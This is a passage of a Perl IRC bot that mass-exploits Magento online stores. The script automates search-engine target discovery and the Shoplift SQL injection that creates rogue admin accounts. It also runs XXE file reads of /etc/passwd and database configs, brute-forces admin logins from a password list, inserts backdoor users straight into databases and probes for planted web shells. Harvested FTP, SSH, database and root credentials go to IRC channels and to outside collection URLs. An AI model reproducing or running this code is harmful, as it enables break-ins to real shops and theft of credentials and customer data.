$response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $filesystem = ($res2 =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "9Installed" : "0Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "9Writable"; #my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; #my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![4SHOPLIFT]! 12".$url." 4<9=4> 12 File_System = $m_fs & Downloader = $m_perm  black panthers![13*]!"); &msg("$channel","![4SHOPLIFT]! 12LOGIN11 [8Success11]12 Balance11 [9 ".$price." 11]12 File_System = $m_fs14 &12 Downloader = $m_perm  ![13*]!"); } } } my @bds = ( "/cloud.php?silk", "/js/cloud.php?silk", "/css.php", "/trial.php?silk", "/js/trial.php?silk", "/js/.log.php", "/.log.php", "/xml.php", "/wp-xml.php", "/wp-sign.php", "/skin/heas.php", "/skin/total.php", "/skin/www.php", "/dupal.php", "/js/.x.php", "/semayan.php", "/plug.php", "/kodox.php", "/css.php", "/uk.php", "/tmp.php", "/cmd.php", "/Neko.php", "/extjs.php", "/js/flash/_cache.php", "/js/extjs/_cache.php", "/js/.index.php", "/js/lib/.index.php", "/405.php", "/.libs.php", "/js/405.php", "/js/get.php", "/404.php", "/js/403.php", "/vega.php", "/js/vega.php", "/mage.php", "/js/mage.php", "/skin/mage.php", "/skin/heas.php", "/skin/total.php", "/ngoi.php", "/js/ngoi.php", "/skin/ngoi.php", "/core.php", "/js/core.php", "/logo.php", "/js/logo.php", "/skin/logo.php", "/skin/signature.php", "/skin/feeds.php", "/eX2.php", "/js/eX2.php", "/skin/eX2.php", "/erorr.php", "/feeds.php", "/downloader/support.php", "/skin/error.php", "/skin/upil.php", "/skin/Signedint.php", "/skin/skinmain.php", "/skin/rss.php", "/skin/skinwizard.php", "/updater.php", "/skin/view.php", "/view.php" ); my @result = &backdoorCheck($site,@bds); if($result[0] ne "false") { &msg("$chanx","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","![7$engine]! [ 11$result[0] OS: $result[1] SAFEMODE:4$result[2] ]"); &msg("$wakil","![7$engine]! [ 11$result[0] OS: $result[1] SAFEMODE:4$result[2] ]"); } } } exit; } } } } ######################################### sub mslAdmin(){ my $site = $_[0]; my(%form); undef %form; $form{username} = "black"; $form{password} = "panthers"; my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->agent($User_Agent[rand(scalar(@User_Agent))]); $ua->cookie_jar(HTTP::Cookies->new(file => $cookietmp, autosave => 1)); $ua->timeout(12); my $req = POST $site,\%form; my $res = $ua->request($req); return $res->content; } sub msxAdmin(){ my $site = $_[0]; my $buka = "http://".$site."downloader/index.php"; my $serv = $site; $serv =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; my @musr = ("burung:kuntul16","stupid:stupid48","admin212:jandaku","indra:indra","ctrl:ctrl","admin:admin","mildnet:jandaku","sysmon:bichhanh","bisikan:bisik","david:ala","super:xxx","akuaja:akuaja","admcoy:busuk","lycoz:wew","policy:tempek","system32:devil123","xSouL:gentho","forme:forme","system_backup:123456","sadmin:asdf","Jhones:kreator","magen:magen","blackunix:crew","sysadm:123456","bogel:gagal","miyabi:wew","stores:stores","jancok:jancok","service:sohai123","dlc:dlc"); my $inpack; my $xtoken; foreach my $cobalogin (@musr){ my ($muzr, $mpaz) = split(/:/, $cobalogin); my(%form); undef %form; $form{username} = $muzr; $form{password} = $mpaz; my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->agent($User_Agent[rand(scalar(@User_Agent))]); $ua->cookie_jar(HTTP::Cookies->new(file => $cookietmp, autosave => 1)); $ua->timeout(10); my $req = POST $buka,\%form; my $res = $ua->request($req); my $res = $res->content; if($res =~ /href=\"(.*?)\?SID=(.*?)\"/i){ $magurl = $1; $maguri = $2; $xtoken.= "?SID=".$maguri; } if($res =~ /File_System/i){ $inpack.="[ 13File_System ]"; } if($res =~ /kontol_module/i){ $inpack.="[ 13kontol_module ]"; } if($res =~ /Grizzly3_MassEmail/i){ $inpack.="[ 13Grizzly3_MassEmail ]"; } if($res =~ /Grizzly_MassEmail/i){ $inpack.="[ 13Grizzly_MassEmail ]"; } if($res =~ /LibMagen_Ext/i){ $inpack.="[ 13LibMagen_Ext ]"; } if($res =~ /Magento_Mass/i){ $inpack.="[ 13Exploiter ]"; } if($res =~ /not have sufficient write permission/i){ $inpack.="[ 14Permission denied ]"; } if($res =~ /form\.install_package_id\.value/i){ $inpack.="[ 3OK ]"; } if($inpack){ if($inpack !~ /Permission denied/){ &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php".$xtoken." ] [ 7".$muzr." - 7".$mpaz." ] ".$inpack.""); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php".$xtoken." ] [ 7".$muzr." - 7".$mpaz." ] ".$inpack.""); } &msg("$channel","![4SHOPLIFT]! [ 12Login Success Boss ] ".$inpack); &WriteLogs("MSL.URL",md5_hex($site)); last; } } } sub dbConnect(){ my $site = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $base = $_[4]; my $port = "3306"; my $form = "mysql"; my $dsn = "dbi:$form:$base:$host:$port"; my $cobaload; my $sita = $site; $sita =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if($pass != ""){ my $chkurl = &ReadLogs("MSL.SQL",md5_hex($site)); if($chkurl == 0){ my $DBIconnect = DBI->connect($dsn, $user, $pass); if($DBIconnect) { $DBIconnect->do("DELETE FROM admin_user WHERE username='black'"); $DBIconnect->do("DELETE FROM admin_role WHERE user_id=6969"); $DBIconnect->do("INSERT INTO admin_user (user_id, firstname, lastname, email, username, password, created, modified, logdate, lognum, reload_acl_flag, is_active, extra) VALUES (6969, 'magento', 'developer', 'developer\@magentocommerce.com', 'black', '7d07a1df8110fe550c6ad2f88d3c7e98', '2015-05-05 05:05:05', '2015-05-05 05:05:05', '2015-05-05 05:05:05', 1, 0, 1, 'N;')"); $DBIconnect->do("INSERT INTO admin_role (parent_id, tree_level, sort_order, role_type, user_id, role_name) VALUES (1, 2, 0, 'U', 6969, 'developer')"); $DBIconnect->do("DELETE FROM magento_admin_user WHERE username='black'"); $DBIconnect->do("DELETE FROM magento_admin_role WHERE user_id=6969"); $DBIconnect->do("INSERT INTO magento_admin_user (user_id, firstname, lastname, email, username, password, created, modified, logdate, lognum, reload_acl_flag, is_active, extra) VALUES (6969, 'magento', 'developer', 'developer\@magentocommerce.com', 'black', '7d07a1df8110fe550c6ad2f88d3c7e98', '2015-05-05 05:05:05', '2015-05-05 05:05:05', '2015-05-05 05:05:05', 1, 0, 1, 'N;')"); $DBIconnect->do("INSERT INTO magento_admin_role (parent_id, tree_level, sort_order, role_type, user_id, role_name) VALUES (1, 2, 0, 'U', 6969, 'developer')"); $DBIconnect->do("DELETE FROM mage_admin_user WHERE username='black'"); $DBIconnect->do("DELETE FROM mage_admin_role WHERE user_id=6969"); $DBIconnect->do("INSERT INTO mage_admin_user (user_id, firstname, lastname, email, username, password, created, modified, logdate, lognum, reload_acl_flag, is_active, extra) VALUES (6969, 'magento', 'developer', 'developer\@magentocommerce.com', 'black', '7d07a1df8110fe550c6ad2f88d3c7e98', '2015-05-05 05:05:05', '2015-05-05 05:05:05', '2015-05-05 05:05:05', 1, 0, 1, 'N;')"); $DBIconnect->do("INSERT INTO mage_admin_role (parent_id, tree_level, sort_order, role_type, user_id, role_name) VALUES (1, 2, 0, 'U', 6969, 'developer')"); $DBIconnect->do("DELETE FROM mg_admin_user WHERE username='black'"); $DBIconnect->do("DELETE FROM mg_admin_role WHERE user_id=6969"); $DBIconnect->do("INSERT INTO mg_admin_user (user_id, firstname, lastname, email, username, password, created, modified, logdate, lognum, reload_acl_flag, is_active, extra) VALUES (6969, 'magento', 'developer', 'developer\@magentocommerce.com', 'black', '7d07a1df8110fe550c6ad2f88d3c7e98', '2015-05-05 05:05:05', '2015-05-05 05:05:05', '2015-05-05 05:05:05', 1, 0, 1, 'N;')"); $DBIconnect->do("INSERT INTO mg_admin_role (parent_id, tree_level, sort_order, role_type, user_id, role_name) VALUES (1, 2, 0, 'U', 6969, 'developer')"); my $DBIcheck = $DBIconnect->prepare("SELECT * FROM admin_user WHERE user_id=6969"); $DBIcheck->execute(); my $row = $DBIcheck->fetchrow_hashref(); if($row->{'username'} == "black") { $cobaload.=" [ 7Execute success ]"; } my $xdcek = "http://".$site."downloader/index.php"; my $check = &Query($xdcek); if($check =~ /Magento Downloader/i) { $cobaload.=" [ 12".$xdcek." ]"; } &msg("$admin","![4MSL-PMA]! [ 14Hostname:3 ".$host." - 14Username:3 ".$user." - 14Password:3 ".$pass." - 14Database:3 ".$base." ] [ 12http://".$site." ] [ 14Login success ]".$cobaload); &msg("$wakil","![4MSL-PMA]! [ 14Hostname:3 ".$host." - 14Username:3 ".$user." - 14Password:3 ".$pass." - 14Database:3 ".$base." ] [ 12http://".$site." ] [ 14Login success ]".$cobaload); &msg("$channel","![4MSL-PMA]! [ 12Found ]".$cobaload); &WriteLogs("MSL.SQL",md5_hex($site)); $DBIcheck->finish(); $DBIconnect->disconnect(); } } else { &msg("$channel","![4X]! phpmyadmin: 14".$sita." ![13*]!"); } } } sub mageAuth(){ my($site, $host, $user, $pass, $base)=@_; if($user =~ /\_/){ my ($users) = split("_", $user); $user = $users[0]; } my $sever = $site; $sever =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; my $ftpcek = &Query($ftptest."?ftp=".$sever."&user=".$user."&pass=".uri_escape($pass), 25); if($ftpcek =~ /Login Succes/){ &msg("$admin","![4MAG]! [ 12".$site." - 12".$user." - 12".$pass." ] [ 10FTP Authorized ]"); &msg("$wakil","![4MAG]! [ 12".$site." - 12".$user." - 12".$pass." ] [ 10FTP Authorized ]"); &msg("$channel","![4MAG]! [ 12".$sever." ] [ 10FTP Authorized ]"); sleep(3); my $bukasock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"2082", Proto=>"tcp", Timeout=>"7"); if($bukasock) { &msg("$admin","![4CPX]! [ 12".$host." - 12".$user." - 12".$pass." ] [ 3CPX Detected ]"); &msg("$wakil","![4CPX]! [ 12".$host." - 12".$user." - 12".$pass." ] [ 3CPX Detected ]"); &Query("http://bestphoenixairportparking.com/wp-content/plugins/statistics/log.php?name=CPX&host=$host&user=$user&pass=".uri_escape($pass), 2); $bukasock->close; } } if($sshcheck == 1){ my $sshcek = &Query($sshtest."?ssh=".$sever."&user=".$user."&pass=".uri_escape($pass), 30); if($sshcek =~ /Login Succes/){ &msg("$admin","![13SSH]! [ 12".$site." - 12".$user." - 12".$pass." ] [ 13SSH Authorized ]"); &msg("$wakil","![13SSH]! [ 12".$site." - 12".$user." - 12".$pass." ] [ 13SSH Authorized ]"); } my $sshroot = &Query($sshtest."?ssh=".$sever."&user=root&pass=".uri_escape($pass), 30); if($sshroot =~ /Login Succes/){ &msg("$admin","![7ROOT]! [ 12".$site." - 12root - 12".$pass." ] [ 7ROOT Authorized ]"); &msg("$wakil","![7ROOT]! [ 12".$site." - 12root - 12".$pass." ] [ 7ROOT Authorized ]"); } } } sub mageSQL(){ my($site, $host, $user, $pass, $base)=@_; my $serv = $site; $pass =~ s/[\s|\r|\n]+//; $serv =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; my $cobaload; my @mysqlpath = ('phpMyAdmin', 'PhpMyAdmin', 'phpmyadmin', 'PHPMYADMIN', 'pma', 'PMA', 'mysql', 'adminer.php'); if($pass){ my $chkurl = &ReadLogs("MSL.SQL",md5_hex($site)); if($chkurl == 0){ foreach my $path (@mysqlpath){ my $urlpath = "http://".$site.$path; my $request = HTTP::Request->new(GET => $urlpath); my $browser = LWP::UserAgent->new(); $browser->timeout(10); my $response = $browser->request($request); if($response->is_success && ($response->content =~ /phpmyadmin|adminer/i) && ($response->content =~ /password/i)){ my $xdcek = "http://".$site."downloader/"; my $check = &Query($xdcek); if($check =~ /Magento Downloader/i){ $cobaload = "[ 12".$xdcek." ]"; } &msg("$admin","![4MAG-SQL]! [ 14Hostname:3 ".$host." - 14Username:3 ".$user." - 14Password:3 ".$pass." - 14Database:3 ".$base." ] [ 12".$urlpath." ]".$cobaload); &msg("$channel","![4MAG-SQL]! [ 12".$urlpath." ]"); &WriteLogs("MSL.SQL",md5_hex($site)); last; } } if($host =~ /^127\.0\.0|^localhost/i){ &dbConnect($site, $serv, $user, $pass, $base); } else { my $xdbhost = "http://".$host."/"; my $request = HTTP::Request->new(GET => $xdbhost); my $browser = LWP::UserAgent->new(); $browser->timeout(10); my $response = $browser->request($request); if($response->is_success && $response->content =~ /phpmyadmin/i){ my $xdcek = "http://".$site."downloader/index.php"; my $check = &Query($xdcek); if($check =~ /Magento Downloader/i){ $cobaload = "[ 12".$xdcek." ]"; } &msg("$admin","![4MAG-PMA]! [ 14Hostname:3 ".$host." - 14Username:3 ".$user." - 14Password:3 ".$pass." - 14Database:3 ".$base." ] [ 12".$xdbhost." ]".$cobaload); &msg("$channel","![4MAG-PMA]! [ 12".$xdbhost." ]"); &WriteLogs("MSL.SQL",md5_hex($site)); } } } else { &msg("$channel","![13X]! phpmyadmin: 14".$serv." ![13*]!"); } } my $urlmami = "http://".$site."magmi/web/plugin_upload.php"; my $remagmi = HTTP::Request->new(GET => $urlmami); my $browsmi = LWP::UserAgent->new(); $browsmi->timeout(10); my $responmi = $browsmi->request($remagmi); if($responmi->is_success && $responmi->content =~ /magmi_utilities\.php/i){ if($responmi->content !~ /DISABLED FOR SECURITY REASONS/i){ &msg("$admin","![4MAGMI]! [ 12http://".$serv."/magmi/web/magmi.php ]"); &msg("$wakil","![4MAGMI]! [ 12http://".$serv."/magmi/web/magmi.php ]"); &msg("$channel","![4MAGMI]! [ 12Plugins ]"); } } } sub mageConnect(){ my $site = $_[0]; my $serv = $site; $serv =~ s/http:\/\/([-a-zA-Z0-9\.]+)\/.*/$1/; my $buka = &mageQuery($site, "downloader/connect.cfg"); if($buka =~ /ftp:\/\/(.*?)\"/i) { my $nemu = $1; &msg("$admin","![4CONN]! [ 03".$nemu." ] [ 12".$serv." ]"); &msg("$wakil","![4CONN]! [ 03".$nemu." ] [ 12".$serv." ]"); &msg("$channel","![4MAG]! [ 13Success ] [ 10FTP Authorized ]"); } } sub mageDown(){ my $site = $_[0]; my $serv = $site; $serv =~ s/http:\/\/([-a-zA-Z0-9\.]+)\/.*/$1/; my $buka = &mageQuery("http://".$site."downloader/connect.cfg"); if($buka =~ /ftp:\/\/(.*?)\"/i) { my $nemu = $1; &msg("$admin","![4CONN]! [ 03".$nemu." ] [ 12".$serv." ]"); &msg("$wakil","![4CONN]! [ 03".$nemu." ] [ 12".$serv." ]"); &msg("$channel","![4MAG]! [ 13Success ] [ 10FTP Authorized ]"); } } sub mageQuery(){ my $url = $_[0]; my $opo = $_[1]; my $uag = LWP::UserAgent->new(agent => 'Magento'); $exp = "<?xml version=\"1.0\"?>\n"; $exp .= "<!DOCTYPE foo [\n"; $exp .= "<!ELEMENT methodName ANY>\n"; $exp .= "<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=".$opo."\">]>\n"; $exp .= "<methodCall>\n"; $exp .= "<methodName>&xxe;</methodName>\n"; $exp .= "</methodCall>\n"; $uag->timeout(10); my $res = $uag->request(POST $url, Content_Type => 'text/xml', Content => $exp); if($res->content =~ /quot;(.*?)"/i){ return decode_base64($1); } else { return "Dicks Looking for Cunts"; } } sub mageBrute(){ my($site, $index)=@_; my $hozz = $site; $hozz =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; my $var; my $xxu = &mageForce($index, "/etc/passwd"); if($xxu =~ /\/bin\/bash/i){ #&msg("$channel","![13X]! Reading passwd: 12".$hozz." ![13*]!"); my @dancok = split(/\n/, $xxu); foreach my $path (@dancok){ my ($arr_a) = split(/:/,$path); my ($arr_b,$arr_c) = split(/:/,reverse($path)); my ($username) = split(/:/,$arr_a); my ($binshell) = split(/:/,reverse($arr_b)); my ($userhome) = split(/:/,reverse($arr_c)); #----------------------- Buka home directory -----------------------# if($userhome =~ /\/vhosts\//){ $var = "httpdocs"; } elsif($userhome =~ /\/var\/www\/web/){ $var = "www"; } elsif($userhome =~ /\/htdocs/){ $var = ""; } elsif($userhome =~ /\/var\/www$/){ $var = "html"; } else { $var = "public_html"; } #-------------------------------------------------------------------# #&msg("$chanxxx", "$path - ".$userhome."/".$var."/app/etc/local.xml"); my $xxe = &mageForce($index, "".$userhome."/".$var."/app/etc/local.xml"); if($xxe =~ /<password><\!\[CDATA\[(.*?)\]\]><\/password>/i){ $pazz = $1; &msg("$admin","![7MAG-FORCE]! [ 12".$hozz." - 12".$username." - 12".$pazz." ] [ 14".$userhome."/".$var." ]"); &mageAuth($site, $hozz, $username, $pazz, "NULL"); } } } } sub mageForce(){ my $url = $_[0]; my $opo = $_[1]; my $uag = LWP::UserAgent->new(agent => 'Magento'); $exp = "<?xml version=\"1.0\"?>"; $exp .= "<!DOCTYPE foo ["; $exp .= "<!ELEMENT methodName ANY>"; $exp .= "<!ENTITY xxe SYSTEM \"file://".$opo."\">]>"; $exp .= "<methodCall>"; $exp .= "<methodName>&xxe;</methodName>"; $exp .= "</methodCall>"; $uag->timeout(10); my $res = $uag->request(POST $url, Content_Type => 'text/xml', Content => $exp); return $res->content; } ##[ PENCARIAN ]## sub magadmin() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$magelogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [15 finish ]"); } my $test = "http://".$site."index.php/admin"; my $test1 = "http://".$site."app/etc/local.xml"; my $test2 = "http://".$site."api/xmlrpc"; my $test3 = "".$shopliftxpl."?target=http://".$site."/"; my $html = &get_content($test); if ($html =~ /username/ ) { my $dirk = "admin"; my $injek = "http://".$site.$dirk."/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ3N5c3RlbV9iYWNrdXAnLCAnbWFnZW50bycsICdzeXN0ZW1fYmFja3VwQGdtYWlsLmNvbScsICdzeXN0ZW1fYmFja3VwJywgJzlkNzI5ZTU5MTM1NzJlYzZmMTJlNmZiN2JmMjRkMGM3Om1nJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ3N5c3RlbV9iYWNrdXAnKTs7IC0tIA=="; my $execute = &get_content($injek); &chkdownload($site,$dirk,$chan,$engine); } my $html1 = &get_content($test1); if ($html1 =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/ ) { if ($html1 =~ /<frontName><!\[CDATA\[(.*)\]\]\><\/frontName>/){$dirs=$1;} if ($html1 =~ /<table_prefix><!\[CDATA\[(.*)\]\]\><\/table_prefix>/){$prefixs=$1;} my $injek1 = "http://".$site.$dirs."/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ3N5c3RlbV9iYWNrdXAnLCAnbWFnZW50bycsICdzeXN0ZW1fYmFja3VwQGdtYWlsLmNvbScsICdzeXN0ZW1fYmFja3VwJywgJzlkNzI5ZTU5MTM1NzJlYzZmMTJlNmZiN2JmMjRkMGM3Om1nJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ3N5c3RlbV9iYWNrdXAnKTs7IC0tIA=="; my $execute1 = &get_content($injek1); &chkdownload($site,$dirs,$chan,$engine); } my $tes = "http://www.customframemalaysia.com//modules/aweber/.awebe.php?target=http://".$site."&type=shoplift"; my $htmlx = &get_content($tes); if ($htmlx =~ /is vulnerable/) { my $test1x = "http://".$site."skin/error.php"; my $test2x = "http://".$site."peler.php"; my $test3x = "http://".$site."405.php"; my $test4x = "http://".$site."feeds.php"; my $test5x = "http://".$site."skin/Signedint.php"; my $test6x = "http://".$site."Neko.php"; my $test7x = "http://".$site."cache.php"; my $test8x = "http://".$site."upil.php"; my $test9x = "http://".$site."kodox.php"; my $test10x = "http://".$site."css.php"; my $html1x = &get_content($test1x); if ($html1x =~ /post>Password:/) { #&get_content("".$botsaver."?x=-SHELL- ".$test1x.""); &msg("$channel","![7X]! [15 Shell ] FOUND "); &msg("$admin","$magelogo 14$engine ".$test1x." "); } my $html2x = &get_content($test2x);#sleep(1); if ($html2x =~ /CaLiBeR/i) { if ($html2x =~ /<b><br><br>(.*)<br>/){$osx=$1;} #&get_content("".$botsaver."?x=-SHELL- ".$test2x." (OS:".$osx.")"); &msg("$channel","![7X]! [15 Shell ] 9".$osx.""); &msg("$admin","$magelogo 14$engine ".$test2x." "); } my $html3x = &get_content($test3x); if ($html3x =~ /BArNEr/i) { #&get_content("".$botsaver."?x=-SHELL- ".$test3x.""); &msg("$channel","![7X]! [15 Shell ] FOUND"); &msg("$admin","$magelogo 14$engine ".$test3x.""); } my $html4x = &get_content($test4x);#sleep(1); if ($html4x =~ /post>Password:/) { &get_content("".$botsaver."?x=-SHELL- ".$test4x.""); &msg("$admin","$magelogo 14$engine ".$test4x." Sh4ll"); &msg("$channel","![7X]! [15 Shell ] FOUND"); } my $html5x = &get_content($test5x); if ($html5x =~ /post>Password:/) { &get_content("".$botsaver."?x=-SHELL- ".$test5x.""); &msg("$channel","![7X]! [15 Shell ] FOUND"); &msg("$admin","$magelogo 14$engine ".$test5x.""); } my $html6x = &get_content($test6x);#sleep(1); if ($html6x =~ /GIF89Giam/) { if ($html6x =~ /post>Password:/){$osx=$1;} #&get_content("".$botsaver."?x=-SHELL- ".$test2x." (OS:".$osx.")"); &msg("$channel","![7X]! [15 Shell ] FOUND"); &msg("$admin","$magelogo 14$engine ".$test6x." 9".$osx.""); } my $html7x = &get_content($test7x); if ($html7x =~ /post>Password:/) { #&get_content("".$botsaver."?x=-SHELL- ".$test7x.""); &msg("$channel","![7X]! [15 Shell ] FOUND "); &msg("$admin","$magelogo 14$engine ".$test7x." "); } my $html8x = &get_content($test8x); if ($html8x =~ /GIF89GHZ/) { #&get_content("".$botsaver."?x=-SHELL- ".$test8x.""); &msg("$channel","![7X]! [15 Shell ] FOUND "); &msg("$admin","$magelogo 14$engine ".$test8x." "); } my $html9x = &get_content($test9x); if ($html9x =~ /post>Password:/) { #&get_content("".$botsaver."?x=-SHELL- ".$test9x.""); &msg("$channel","![7X]! [15 Shell ] FOUND "); &msg("$admin","$magelogo 14$engine ".$test9x." "); } my $html10x = &get_content($test10x); if ($html10x =~ /JavaShell/) { #&get_content("".$botsaver."?x=-SHELL- ".$test10x.""); &msg("$channel","![7X]! [15 Shell ] FOUND "); &msg("$admin","$magelogo 14$engine ".$test10x." "); } my $injekx = "http://".$site.$dir."/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ3N5c3RlbV9iYWNrdXAnLCAnbWFnZW50bycsICdzeXN0ZW1fYmFja3VwQGdtYWlsLmNvbScsICdzeXN0ZW1fYmFja3VwJywgJzlkNzI5ZTU5MTM1NzJlYzZmMTJlNmZiN2JmMjRkMGM3Om1nJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ3N5c3RlbV9iYWNrdXAnKTs7IC0tIA=="; my $fz = &get_content($injekx); my $url = "http://".$site."/admin"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "system_backup"; my $password = "123456"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![7SHOPLIFT]!".$url." 4<9=4> 8 File_System = $fs & Downloader = $out ![6*]!"); &msg("$channel","![7X]! [9success11]12 Balance11 [3 ".$price." 11] ![5*]!"); } } } } my $html2 = &get_content($test2); if ($html2 =~ /faultString/i ) { my $exl = &xxe_query($test2); if ($exl =~ m/PD94(.*)/){ my $data = $1; my $hash = decode_base64($data); if ($hash =~ 